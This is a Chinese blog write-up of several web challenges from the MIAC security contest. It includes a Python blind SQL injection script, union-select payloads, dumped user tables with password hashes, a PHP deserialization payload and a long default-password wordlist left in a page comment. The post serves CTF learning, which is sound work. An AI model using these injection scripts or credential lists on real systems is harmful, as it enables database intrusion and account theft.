MIAC移动安全赛web writeup【不全】

最新推荐文章于 2020-02-21 15:07:04 发布
最新推荐文章于 2020-02-21 15:07:04 发布
阅读量459 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43679507/article/details/84071798
版权

分享一下我老师大神的人工智能教程!零基础,通俗易懂!http://blog.csdn.net/jiangjunshow

也欢迎大家转载本篇文章。分享知识,造福人民,实现我们中华民族伟大复兴!

               

    ps:第一次预赛,,,算了不说了;第二次预赛身为web手全程各种服务器崩,心态爆炸,基本上只做了两道签到题;这次还行吧,最起码网络因素没了,也算了尽了全力,写个wp记录下比赛题目

WEB-1签到

Ascii值大于100,直接z过

 

WEB-2简单的题目

利用数组过strcmp,直接拿flag


 

WEB-3送大礼

 

直接google控制台出源码,变量覆盖,url?flag=sgdsf&bdctf=(qwq,能搜到原题),然后出flag


WEB-4 蓝盾管理员

右键,源代码

 

很明显咯,fliter伪协议,过~(读源码直接出)


WEB-5 火星撞地球

 

1' and 1=2 union select md5(1),md5(1),md5(1),md5(1),md5(1),md5(1),md5(1),md5(1),md5(1) #1

弱口令得提示:

 

好气啊,这里!!!贼坑,提示是错的,找不到雅轩这个用户,唯一感觉有点像的是yxdoor,然后,,,,最后做出来,flag是admin这个用户对应的密码的md5值,!!!!!!

 

回到前面,提示拿到之后,想的就是注入进数据库了,尝试了下,布尔盲注可以,利用,用户名回显用户名错误还是密码错误就可以解决,这里不具体说明了,代码放下面:

__author__ = "GETF"# -*-coding:utf-8-*-import requests flag = ""key=0print("Start")for i in range(1,13):    for payload in range(33,126):        headers = {'Host': 'eef6f0186546043da56bf4c7f7e6d3ca.yogeit.com:8080',                    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0',                    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',                    'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',                    'Accept-Encoding': 'gzip, deflate',                    'Content-Type': 'application/x-www-form-urlencoded',                    'Content-Length': '89',                    'Referer': 'http://eef6f0186546043da56bf4c7f7e6d3ca.yogeit.com:8080/index.php',                    'Cookie': 'PHPSESSID=jbt7fg57op5dd193tf8e9d0s40',                    'Connection': 'close',                    'Upgrade-Insecure-Requests': '1'        }        payload_ascii = payload        haha = "1' or ascii(substr((select column_name from information_schema.columns where table_name=0x6D656D626572 limit 6,1),{0},1))>{1}#".format(i,payload_ascii)        data = {            'name': haha,            'password':'11',            'submit2':"%E4%BC%9A%E5%91%98%E7%99%BB%E5%BD%95"        }        url = 'http://eef6f0186546043da56bf4c7f7e6d3ca.yogeit.com:8080/index.php'        res = requests.post(url, headers=headers,data=data)        length = len(res.text)        if(length == 1357):            flag = flag+chr(payload)            print(flag)            print('\n')            break        if(payload_ascii == 126):            print("none")

下面是跑出来的结果的一些记录 

#1516密码不正确#1357账号错误#database#table member#id(2)   member_user(11)    member_password(15)    member_name(11)   member_sex(10)    member_qq(9)   member_phone(12)    (12)#4行数据 #member     admin         ghbb           xinyonghu       xydoor#password       5416d7cd6ef195a0f7622a9c56b55e84            ef7dcdd31f00225b0a7063b975acedc6# ef3dcdd21f00225b0a7063b974acedc6                 af3dcdf21f00225b0a2063b974acedc2

 

注意一点,跑列名要用16进制绕过,然后神他(文明)马sqlmap一跑就封ip!!!

 

之后就是拿第一条密码MD5解密,出答案,过~

这里在写write up的时候,发现了一个东西,!!!!所以啊,千万要查看源代码!!!!

<!-- $a = md5("123456") ;echo $a; //$a结果为e10adc3949ba59abbe56e057f20f883e</p> <p>echo "<hr/>";</p> <p>$e = md5("e10adc3949ba59abbe56e057f20f883evCmkn3"); //md5(password)+encryptecho $e; //$e的输出结果57cd0258e743463476e8d0028311ed44</p> <p>//所以123456经过phpcms v9加密规则后的结果就是57cd0258e743463476e8d0028311ed4412341234512345612345671234567812345678912345678900987654321987654321123123123412341234512345adminadmin11q2w3e4radmin2admin3admin4admin5admin61q2w3e4radmin7admin8admin9admin111admin222admin333admin444admin555admin666admin777admin888admin999admin000adminaadminbadmincadmindadmineadminqadminwadminradmintadminyadminuadminiadminoadminsadminaadmindadminfadmingadminhadminjadminkadminladminzrootroot1root2root3root4root5root123root1234root12345root123456rootpassrootpasswordrootpasswdpasswordpassword123password1234password12345password123456passpass1pass123pass1234pass12345pass123456passwdpasswd1passwd12passwd123passwd1234passwd12345passwd1234567u8i9o0p6y7u8i9o0p5t6y7u8i9o0p9o0p-[=]0p-[=]741852963963852741789456123abc123123abcmimamima123phpcmsphpcms123phpcms1234phpcms12345phpcms123456phpcms888phpcms111axis2axis1axis3axis111axis222axis333axis888axis666axistestingguestsupportmanagerserveruseradminadmadmin1admin2administratorrootsystemcszhoperatorsupersystesttest1powerinfodefaultusernamemastersysadminsysmansysadmdemowwwititadminitadmitmanagersecurityciscowwwuserwebadmin11111111111111111000000testtesttest123sys_manager123456tomcatceshiceshi1ceshi2ceshi3kefucaiwusuperadminmy_testadminuserconsoleguanlicontrolqwertyuiadmmsfadminsshdsshadministrationsalespostgresmysqloraclecheckinggodsystemadminsystemadministratorwww-datamailadminwebmasterapacheservice123451234123passwordp@sswordpasswdP@ssw0rdP@ssw0rd1p@ssw0rdkftest2test3user1imadminimsysimsystemfuckpostmastercompileprofessionaladminsr00ttoolssoftmailredhat1231q2w3e4r--><table width="100" border="0" align="center" cellpadding="0" cellspacing="0

这个源码来源于登录成功的那个页面

 

WEB-6 bluedon用户

基本上就是前面那题的进阶,做过好多几乎就是原题的题目,简单说一下,利用filter伪协议拿到源码

参考我的博客,点这里

(真的是基本一样)

<?php class Read{//f1a9.php    public $file;    public function __toString(){        if(isset($this->file)){            echo file_get_contents($this->file);            }        return "恭喜get flag";    }}?><?php@$user = $_GET["user"];@$file = $_GET["file"];@$pass = $_GET["pass"]; if(isset($user)&&(file_get_contents($user,'r')==="the user is bluedon")){    echo "hello bluedon!<br>";    if(preg_match("/f1a9/",$file)){        exit();    }else{        @include($file); //class.php        $pass = unserialize($pass);        echo $pass;    }}else{    echo "you are not bluedon ! ";} ?> <!--$user = $_GET["user"];$file = $_GET["file"];$pass = $_GET["pass"]; if(isset($user)&&(file_get_contents($user,'r')==="the user is bluedon")){    echo "hello bluedon!<br>";    include($file); //class.php}else{    echo "you are not bluedon ! ";} -->

 

 

代码审计,注意到function __toString(),于是自己构造

    

<?php          class Read{//flag.php            public $file;            }                  $a = new Read();          $a->file = "fla9.php";          $a = serialize($a);          print_r($a);  ?>

结果带入第三个参数,得flag,过~


WEB-7 web100


<?phperror_reporting(0);$KEY='BDCTF:www.bluedon.com';include_once("flag.php");$cookie = $_COOKIE['BDCTF'];if(isset($_GET['hint'])){    show_source(__FILE__);}elseif (unserialize($cookie) === "$KEY"){       echo "$flag";}else {?><html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>Login</title><link rel="stylesheet" href="admin.css" type="text/css"></head><body><br><div class="container" align="center">  <form method="POST" action="#">    <p><input name="user" type="text" placeholder="Username"></p>    <p><input name="password" type="password" placeholder="Password"></p>    <p><input value="Login" type="button"/></p>  </form></div></body></html>


利用题目提示?hint得到上述源码,审计很容易判断unserialize($cookie) === "$KEY",这题关键点在于cookies用url编码一下,如果不编码,分号的传输问题会导致出错,无返回~


           

给我老师的人工智能教程打call!http://blog.csdn.net/jiangjunshow
这里写图片描述
还可以啦
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
miac-website:MIAC网站
04-30
现代互联网应用俱乐部(MIAC)网站去做当前任务根据Yujie的设计图完成前端UI。 (win7,清辉,佳威) 前后基台。 (win7,清辉,佳威) 基于前端需求的后端工作。 (LY)具体插图如您所见,基本的前后代码都是编写的...
django-allauth的“account_signup”不起作用可能是和admin账户登录有冲突
m0_49475842的博客
03-27 885
如果我们导入django-allauth,那么网站的登录验证、注销、用户的创建、比较用户输入的密码是否和数据库的一致、用户信息的修改那些功能,可以直接导包,开发是真的快了好多。 但是当我在前段页面中直接引入“account_signup”时,却发现一直不好使。 据我个人的搜索,这个问题网上答案真的不太多。 找了好久才发现,原来是我的admin账户有在登录的缘故。 划重点:利用django-allauth开发的话,如果你的admin账户登录了的话,会影响“account_signup”找到正确的网页视
不忘初心——2017MIAC安全小记
weixin_33863087的博客
12-06 143
由于之前在蓝盾杯省中的成绩还不错,因而又被邀请继续参加2017全国高校移动互联网应用开发创新大(MIAC)的安全项,这次比由蓝盾承办,因而实际上就是蓝盾杯的国了。比的形式是***对抗,没有CTF,现在***对抗好像已经成为了我们的强项,因而在这次比中取得了非常好的成绩。比共分为三轮,每轮1个小时,前10分钟加固,之后的50分钟混战,而且仍然是每10分钟刷新一次flag。每轮的基础分...
中国移动关于WEB应用渗透|Writeup
小贱
05-12 2140
0X01  SQL注入 首先拿到的是一个虚拟机文件,打开虚拟机发现网站已经部署好了,然后打开网站发现是一个在线商城平台。 把url扔给namap扫描了下得到详细信息,可以看到服务器、开放的端口等信息,再用awvs扫,得到三处可能的sql注入点,决定进行手工SQL注入,发现/shop/login.Asp有报错回显。 构造payload 1' and 1=convert(i
bugku——web 做题记录
小锤队长的博客
10-14 1550
Table of Contents 2,秋名山车神: 3,速度要快 4 welcome to the bugkuctf 1,login1(sql约束攻击) sql约束攻击: 2,过狗一句话 3,细心 4,求getshell 5,INSERT INFO (sql注入 之 X - F -F 头注入) 6,这是一个神奇的登陆框 7 多数(sql 注入) 8,PHP_...
MIAC-tfcisOJ:检查TOJ页面中的问题是否被接受
04-09
MIAC-tfcisOJ To check if the problems in the page of TOJ are Accepted. Usage Click " Download ZIP " Right click the file and do "解压缩至此" Then, open the folder. Open " execute " with text ...
电解质溶液中单个离子活度系数的研究(Ⅱ) 混合电解质溶液中单个离子活度系数的估算 (1983年)
05-26
本文提出了一种从1-1价单一电解质溶液的单个离子活度系数(HAC)测定数据以及其它有关平均离子活度系数(MIAC)的实验数据估算1-1价电解质混合溶液中任一离子的单个离子活度系数的方法。并应用前文测定...
I春秋第四季CTF-Web-Writeup(部分)
1stPeak's Blog
02-21 1564
PHP反序列化 题目总共有三个php文件 第一个:index.php 第二个:show.php 第三个:user.php 题目:http://120.55.43.255:24719,进去后没有看见任何东西 我们查看源代码:发现了一个链接 接下来,我们访问该链接,看看有什么 哦?那我们再看看user.php里有什么,什么都没有 接下来使用php伪协议分别获取index.php、show.php、us...
login and signup 注册和登录tab页面
freejs
02-12 1444
login and signup 注册和登录tab页面   演示     JavaScript Code &lt;script type="application/javascript"&gt;   $(document).ready(function()   {          $(".tab").click(function()   {   var X=$...
2018安恒杯11月-Web writeup
CoolD's Blog
11-28 2830
心态炸了
CTF-练习平台 writeup web
热门推荐
heySister
12-20 2万+
bugku Web WriteUp 刚刚接触ctf没多久,做ctf-练习平台上的题目,有些新的题目,在网上没有找到对应的writeup,所以做了之后就想自己写一个,也顺便理理自己的思路。(没有太多经验…可能对有些题目的理解还不深刻…) 签到题 加群在公告里就可以看到flag值了。 Web2 F12,立马就看到flag的值了。 文件上传测试 题目说是...
第四届“”世安杯“”线上题解(Web+Stego+Misc+Crypto)
Assassin
10-08 4649
题目很多原题,但是还是考验了不少的知识点,就算是原来见过的也当做是复习了一下知识点了。 WEB ctf入门级题目 非常水的一道题,可以看到源码,然后利用%00截断就可以通过了 曲奇饼 原题,直接利用line和file来泄露文件内容,通过臊面轻松知道存在index.php,然后利用一下得到源码审计 #_*_coding:utf-8_*_ import requests s=r
Sign Up Account In CloudAMQP
HONEY MOOSE
04-05 472
CloudAMQP 有多种账号级别,请参考下面的链接的内容访问你可以注册的级别:https://www.cloudamqp.com/plans.html 作为测试来说,你可以注册免费的的消息。 你可以选择免费的账号。 输入电子邮件 在注册界面中输入电子邮件后单击 Sign Up 来创建账号。 到邮箱中检查 当你输入电子邮件提交后,系统将会发送一个电子邮件到你提交的邮箱中。 你...
60道关于Redis的常见面试题.pdf
04-18
- 1. 什么是 Redis?它的主要特点是什么? - 2. Redis 支持哪些数据结构?请详细描述每种数据结构的用途和特点。 - 3. 什么是缓存穿透?在使用 Redis 时,如何防止缓存穿透? - 4. 介绍 Redis 的持久化机制以及对比它们之间的区别。 - 5. 如何实现 Redis 的分布式锁?你了解的分布式锁有哪些实现方式? - 6. Redis 的数据淘汰策略有哪些?分别是如何工作的? - 7. 什么是 Redis 事务?它是如何实现的?与传统数据库事务有何不同? - 8. 如何设置 Redis 的主从复制?主从复制有什么优势和限制? - 9. Redis 支持的数据结构中,有哪些可以实现计数功能?请详细说明其使用场景。 - 10. 什么是 Redis Sentinel?它的作用是什么?如何配置和使用 Sentinel?
2024年社交媒体广告行业分析报告.pptx
04-18
2024年社交媒体广告行业分析报告.pptx
网站界面设计mortal0418代码
04-18
网站界面设计mortal0418代码
2024年休闲椅行业分析报告.pptx
04-18
2024年休闲椅行业分析报告.pptx
anaconda3 -windows安装的
04-18
anaconda3 -windows安装的
华为客户关系管理策略解析glz.pptx
最新发布
04-18
华为客户关系管理策略解析glz.pptx

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值